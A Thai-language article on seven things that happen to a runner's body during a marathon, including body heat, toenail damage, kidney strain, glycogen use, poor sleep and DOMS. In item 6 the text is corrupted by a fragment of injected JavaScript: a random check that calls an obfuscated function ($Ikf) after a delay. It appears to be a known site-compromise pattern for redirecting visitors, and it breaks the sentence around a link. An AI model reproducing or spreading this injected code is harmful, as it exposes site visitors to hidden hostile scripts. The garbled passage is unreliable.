ใช้ใจวิ่ง ไม่ใช่คาถาแก้ปัญหาเวลาลงวิ่งแข่งขันมาราธอน แต่การว่างแผนฝึกซ้อมที่ดีจะช่วยให้เราจบได้อย่างสวยงามต่างหาก ทั้งเรื่องการวิ่งเพื่อฝึก CARDIO & ENDURANCE การฝึก STRENGTH TRAINING เพื่อเพิ่มความแข็งแกร่งให้กล้ามเนื้อ และโภชนาการ การหัดดื่มน้ำและรับประทานหาร เพื่อการ REFUEL ขณะวิ่งแข็งขัน ส่วนการใช้ใจวิ่ง การตั้งใจอย่างแน่วแน่นั้น ขอให้มาเป็นเรื่องสุดท้าย ร่างกายไม่พร้อมฝืนวิ่งไป จะเกิดอาการบาดเจ็บ นอนพักฟื้นนานเป็นเดือนแทน
นักวิ่งควรรู้:เกิดอะไรขึ้นกับร่างกายขณะวิ่งมาราธอน
การวิ่งมาราธอน เป็นวิธีเผาผลาญไขมันที่ดีอย่างหนึ่ง แถมได้พัฒนาระบบภูมิต้านทานและเสริมสร้างความแข็งแกร่งของจิตใจ แต่วิ่งมาราธอนใช้จะมีแต่ด้านดี ด้วยระยะทางถึง 42.195K ร่างกายก็สะสมความเครียดจากการวิ่งไปมากเช่นกัน อย่างเช่น การเพิ่มขึ้นของอุณหภูมิร่างกาย การทำงานหนักของไต และอาการปวดเมื่อยล้าของกล้ามเนื้อช่วงล่าง จนกระทั้งการทะเลาะกับบันไดหรือเกิดตะคริงเมื่อตอนตื่นนอน
หากจะลงวิ่งมาราธอน อยากจะให้ผู้อ่านลองดู 7 สิ่งที่จะเกิดขึ้นกับร่างกายเราขณะวิ่งมาราธอน…

1. อุณหภูมิร่างกายจะพุ่งสูงขึ้น เมื่อเริ่มวิ่งไปอุณหภูมิร่างกายก็จะเริ่มเพิ่มสูงขึ้น ด้วยระยะทางที่ต้องวิ่งจนจบ อุณหภูมิอาจจะสูงถึง 38-39 °C (คล้ายๆ กับตอนเป็นไข้หวัดตัวร้อน) ดังนั้นการวางแผนดื่มน้ำเพื่อรักษาระดับน้ำในร่างกายขณะวิ่งและหลังจบจึงเป็นเรื่องสำคัญ นอกจากนนี้ให้ระวังเรื่อง HYPER- และ HYPOTHERMIA ด้วย
2. นิ้วเล็บช่ำและเล็บหลุด เนื่องจากการวิ่งระยะไกล ฝ่าเท้าจะถูกถูไถไปมา บริเวณนิ้วเท้าจะชนผนังรองเท้าไปมา พอนานเข้า อาจจะเกิดเท้าพองหรือนิ้วเล็บม่วงช่ำและหลุดเลือดออกได้ ดังนั้นควรเลือกรองเท้าที่มีความฟิตพอดี ระวังการวิ่งขึ้นลงเนิน เพราะโอกาสนิ้วกระแทกผนังรองเท้าด้านหน้าจะมีสูง
3. ไตทำงานหนัก ผลการสำรวจของ YALE RESEARCHERS พบว่นักวิ่งมาราธอนมีการบาดเจ็บที่ไต ระยะเฉียบพลันระยะที่ 1พบถึงร้อยละ 80 หลังจบการวิ่งมาราธอน แต่ทั้งนี้การฝึกวิ่งทั่วไปไม่ได้ก่อนให้เกิดอันตรายต่อไต แต่การวิ่งระยะทางไกลและการวางแผนดื่มน้ำที่แย่ จะทำให้ไตทำงานหนักมากขึ้น
4. ร่างกายกำลังเผาผลาญไขมันจำนวนมหาศาล โดยร่างกายสามารถเผาผลาญได้ถึงชั่วโมงละ 600-800 KCAL เลยทีเดียว แต่ร่างกายสามารถสะสมพลังงานได้ที่ 500 กรัมของไกลโคเจน แปรงเป็นพลังงานได้ประมาณ 2,000 KCAL และทุก 1K ร่างกายจะเผาพลังงานไปประมาณ 100-125 KCAL ดังนั้นนักวิ่งจึงควรวางแผนการ REFUEL ให้ดี ถ้าไม่ดีก็อาจจะสัมผัสประสบการณ์วิ่งชนกำแพงก็ได้
5. อาการนอนไม่หลับกลางคืน หลังจบมาราธอน นักวิ่งหลายๆ คนอาจจะมีประสบการณ์นอนหลับยาก ตัวร้อนๆ อันเนื่องมาจากอาการ AFTER BURN และอาการที่ร่างกายได้หลั่งฮอร์โมนออกมามากมายระหว่างการวิ่ง (STRESS HORMONE CORTISOL)
6. ขาและช่วงล่างของร่างกาย (LOWER BODY) จะมีอาการปวดเมื่อย กล้ามเนื้อมีอาการตึง หรือเป็นตะคริวได้ สามารถเกิดขึ้นได้ทั้งระหว่างวิ่งและจบการแข่งขัน โดยเฉพาะอย่างยิ่งอาการปวดเมื่อยที่เรียกว่า andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle-muscle-soreness/” target=”_blank” rel=”noreferrer noopener”>DELAYED ONSET MUSCLE SORENESS หรือ DOMS ที่จะเกิดขึ้นหลังจบการวิ่งไปสัก 1 วันและจะหนักขึ้นสูงสุดใน 2-3 วัน
7. ถ้าซ้อมถึง คุณก็จะจบอย่างสวยงาม ร่างกายไม่บาดเจ็บ ร่างกายมีการพัฒนาภูมิคุ้มกันร่างกายที่ดีขึ้น lสุขภาพดีขึ้น และเพราะวินัยที่คุณใส่ลงไประหว่างการฝึกซ้อม จะช่วยให้ร่างกายมีระบบต่างๆ ทำงานได้ดีขึ้น ระบบเผาผลาญพลังงานที่ดีขึ้น ร่งกายเฟริ์ม ช่วยลดความเครียด ช่วยปรับและ MIND SET ให้เข้มแข็งขึ้น
อ้างอิง BLOG.MAPMYRUN.COM